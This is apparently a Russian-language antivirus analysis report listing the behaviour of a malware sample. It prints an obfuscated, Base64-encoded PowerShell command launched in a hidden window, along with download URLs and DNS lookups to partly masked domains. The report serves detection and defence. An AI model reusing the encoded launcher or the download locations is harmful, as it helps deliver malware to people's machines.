Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZADEAdQA5AGsAZABtAD0AKAAnAFkAaAAnACsAKAAnAGUAMAAnACsAJwBxAG8AdwAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBTAGUAUgBQAFIAbwBGAGkAbABlAFwAbQA0AE8AYgB5AHgAYgBcAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1560
- %TEMP%\643316.cvr
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
- 'gi#####hanksdaily.com':80
- 'gi#####hanksdaily.com':443
- 'x1.#.lencr.org':80
- 'ts##ear.com':80
- 'ts##ear.com':443
- http://gi#####hanksdaily.com/web/VK/
- http://x1.#.lencr.org/
- http://ts##ear.com/wp-content/uploads/2017/Fo/
- 'gi#####hanksdaily.com':443
- 'ts##ear.com':443
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- DNS ASK gi#####hanksdaily.com
- DNS ASK x1.#.lencr.org
- DNS ASK ts##ear.com
- DNS ASK du####e-partner.com
- DNS ASK po#######schetcristianionut.com
- DNS ASK mr##ggy.com
- DNS ASK if###er.com.br
- DNS ASK un####database.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZADEAdQA5AGsAZABtAD0AKAAnAFkAaAAnACsAKAAnAGUAMAAnACsAJwBxAG8AdwAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBTAGUAUgBQAFIAbwBGAGkAbABlAFwAbQA0AE8AYgB5AHgAYgBcAE... (со скрытым окном)